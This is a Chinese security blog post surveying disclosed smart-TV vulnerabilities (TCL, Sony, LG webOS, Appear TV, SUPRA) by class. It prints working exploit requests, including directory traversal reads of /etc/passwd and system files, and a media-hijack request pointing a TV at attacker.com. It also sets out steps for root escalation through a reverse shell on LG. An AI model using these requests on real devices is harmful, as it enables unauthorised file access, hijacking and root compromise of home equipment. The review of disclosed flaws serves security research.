智能电视漏洞回顾

admin 2021年4月10日13:00:50评论124 views字数 4665阅读15分33秒阅读模式



【周度激励】 

1.挖洞经验 诡异位置的存储XSS

<https://t.zsxq.com/6aAAMJi>

O8 第一名:500查克拉奖励,500元现金。 

2. 智能电视漏洞回顾

<https://t.zsxq.com/QzfMzrZ> 

饭饭 第二名:300查克拉奖励,300元现金。 



最近在测试某大厂的智能电视中遇到了不少坑,毕竟是第一次专注的研究智能电视,对电视的了解还不够深。挖不动烦躁的时候,就回头想想曾经看过的智能电视的漏洞,记忆都很零散,今天把智能电视曾曝出的漏洞做个汇总,看看大佬们都有哪些奇妙的思路。



命令注入漏洞

某电视名称命令注入






某电视[1]名称重命名使用反引号可注入任意命令。文章中并没有没有说细节吗,猜测是前台设置的电视名称,后端应该是使用系统命令将电视名称设置成 hostname ,由于没有过滤从而造成了任意命令执行。


智能电视漏洞回顾

乐视电视利用 UPnP 安装应用


乐视电视[2]830384_609380)任意应用安装也比较有意思。利用 UPnP 提供的下载服务下载并安装应用,之前并没有想到还有这种操作。现在电视使用的大多使用第三方的投屏服务,这种骚操作的机会少了。

发现 UPnP 协议中通过 XML 文件声明告知手机控制端自身提供原用于遥控器应用更新下载服务可被滥用,通过控制端连接电视后即可发送 XML Message 的方式请求 DownLoadFile 的服务,电视内部收到服务请求未进行有效过滤即进行下载 APK 动作。下载 APK 应用后,发送消息请求电视 DLNA 服务向电视 EUI 系统发送特定内容广播。利用电视广播服务,调用系统内部静默安装服务,并对 Activity 进行调用。







目录遍历漏洞

TCL 目录遍历(CVE-2020-27403)






TCL 电视[3] 7989 开放了 web 服务,未授权用户能够访问电视中的文件。


智能电视漏洞回顾

Sony Smart TV 目录遍历(CVE-2019-10886)

索尼智能电视 “图片共享” 应用没有限制目录,从而可以读取任意文件。

root@kali:~# curl -v http://192.168.1.102:10000/contentshare/image/default.propTrying 192.168.1.102...TCP_NODELAY setConnected to 192.168.1.102 (192.168.1.102) port 10000 (#0)> GET /contentshare/image/default.prop HTTP/1.1> Host: 192.168.1.102:10000 > User-Agent: curl/7.58.0> Accept: />< HTTP/1.1 200 OK< Connection: close< Content-Length: 591< Content-Type: application/octet-stream<# # ADDITIONAL_DEFAULT_PROPERTIES#ro.secure=1security.perf_harden=1ro.allow.mock.location=0ro.debuggable=0 ro.zygote=zygote32dalvik.vm.image-dex2oat-Xms=64mdalvik.vm.image-dex2oat-Xmx=64mdalvik.vm.dex2oat-Xms=64m dalvik.vm.dex2oat-Xmx=512mro.dalvik.vm.native.bridge=0 debug.atrace.tags.enableflags=0 # # BOOTIMAGE_BUILD_PROPERTIES # ro.bootimage.build.date=2016? 11? 14? ??? 15:34:56 JST ro.bootimage.build.date.utc=1479105296     ro.bootimage.build.fingerprint=Sony/BRAVIA_ATV2_PA/BRAVIA_ATV2:6.0.1/MMB29V.S50/1.6.0.06.14.0.00:user/release-keys persist.sys.usb.config=none
Closing connection 0 





Appear TV 目录遍历(CVE-2018-7539)


Appear TV XC5000 、XC5100 电视的 “Maintenance Center” 服务对外开放了WEB服务,监听在 8088 端口。

GET /../../../../../../../../../../../../etc/passwdHost: x.x.x.x:8088User-Agent: curl/7.56.1Accept: /

HTTP/1.1 200 OKContent-Length: 1110Content-Type: text/plain; charset=utf-8Cache-Control: max-age=3600Server: fuzzd/0.1.1
root:x:0:0:root:/root:/bin/ashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologin


权限提升

LG webOS OS[4]任意文件覆盖提权

任意文件覆盖:luna-send-pub 命令调用 downloadmanager 服务可以下载文件到本地的任意位置,且文件属主为 root 。

系统中的 /etc/luna-services2/ls-hubd.conf 配置文件中定义了可执行脚本,脚本在点数开机的之后会被 Root 调用指令。

[Dynamic Services]ExecPrefix=/usr/sbin/setcpushares-ls2LaunchTimeout=300000

于是,可以通过覆盖 ls-hubd.conf 配置文件,将 ExecPrefix 的值设定为自定义脚本所在的路径。当电视重启之后,就能够提升到 Root 权限了。

1. 在本地创建 ls-hubd.conf 文件;

2. 在电视中编写反弹 shell 脚本;

3. 使用 luna-send-pub 下载 ls-hubd.conf 覆盖原有文件;

4. 本地监听,然后重启服务之后就拿到了具备 Root 权限了 Shell 了。



拒绝服务漏洞

Sony BRAVIA 电视 TCP 泛洪攻击(CVE-2019-11890)






Sony 电视泛洪攻击电视会重启。原来电视也怕 TCP 泛洪攻击,还以为只有像工控的这种低性能设备重启的概率会高一些。

此外,还有不少其他形式的 DOS,如缓冲器溢出等,由于没有公布细节,这里就不讲了。

其他漏洞

ADB






KDDI Smart TV Box[5]7920/index.html) 默认在 5555 端口开放了 ADB。

Jector Smart TV FM-K75[6]r/CVE-2019-9871) 默认在 5555 端口开放了 ADB,且权限为 root。


SUPRA智能云电视视频劫持漏洞(CVE-2019-12477)

SUPRA[7] 电视开放了 80 端口,提供的功能包含自定义的投屏服务,但没有验证用户和资源的合法性,于是未授权用户就可以播放任意内容。

向电视设备插入任意视频播放的构造请求如下。

GET /remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8 HTTP/1.1Host: 192.168.1.155User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1


现在,电视开放的端口还挺多的。尤其是现在有的家电厂商希望把智能电视打造为智能家居的中枢,肩负的任务也越来越多,但不少的服务没有基本的授权验证。


Sony Smart TV 信息泄露

Sony Smart TV 在 10000 端口开放了 WEB 服务,未授权用户访问 /contentshare 页面,可以获取无线网络的明文密码。

总结

智能电视形似一台有着巨大屏幕的手机,与手机不同的是智能电视作为服务端提供各类服务。由于电视厂家有各自生态的考量,应用五花八门,分析纰漏出来的漏洞,不少是权限问题,各种服务的认证问题还是重中之重。从CVE 、CNVD 中的数据来看,拒绝服务最多,然后是目录遍历、命令执行,最后是信息泄露、提权等。

看完前人的这些经验,不少新的点就蹦出来了,继续挖洞。

这次对电视进行漏洞挖掘还是有不少收获,等电视漏洞修复之后,再与大家分享一些心得。


published from :[智能电视漏洞回顾]


References

[1] 某电视:

 https://www.netsparker.com/blog/web-security/hacking-smart-tv-command-injection/
[2] 乐视电视:

https://www.sohu.com/a/279830384_609380

[3] TCL 电视: 

https://sick.codes/extraordinary-vulnerabilities-discovered-in-tcl-android-tvs-now-worlds-3rd-largest-tv-manufacturer/
[4] LG webOS OS: 

https://blog.recurity-labs.com/2021-02-03/webOS_Pt1.html
[5] KDDI Smart TV Box: 

http://jvn.jp/en/jp/JVN17127920/index.html
[6] Jector Smart TV FM-K75: 

https://github.com/cvereveal/CVEs/tree/master/CVE-2019-9871
[7] SUPRA: 

https://www.freebuf.com/vuls/208520.html


于是,可以通过覆盖 ls-hubd.conf 配置文件,将 ExecPrefix 的值设定为自定义脚本所在的路径。当电视重启之后,就能够提升到 Root 权限了。

1. 在本地创建 ls-hubd.conf 文件;

2. 在电视中编写反弹 shell 脚本;

3. 使用 luna-send-pub 下载 ls-hubd.conf 覆盖原有文件;

4. 本地监听,然后重启服务之后就拿到了具备 Root 权限了 Shell 了。



【火线Zone】


火线Zone是[火线安全平台]运营的封闭式社区,社区成员必须在[火线安全平台]提交有效漏洞才能申请免费加入,符合要求的白帽子可联系[火小表妹]免费加入~

我们不希望出现劣币驱逐良币的结果,我们不希望一个技术社区变成一个水区!

欢迎具备分享精神的白帽子加入火线Zone,共建一个有技术氛围的优质社区!


智能电视漏洞回顾



智能电视漏洞回顾




扫码关注我们

添加微信:hxanquan



本文始发于微信公众号(火线Zone):智能电视漏洞回顾

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月10日13:00:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   智能电视漏洞回顾https://cn-sec.com/archives/331514.html

发表评论

匿名网友 填写信息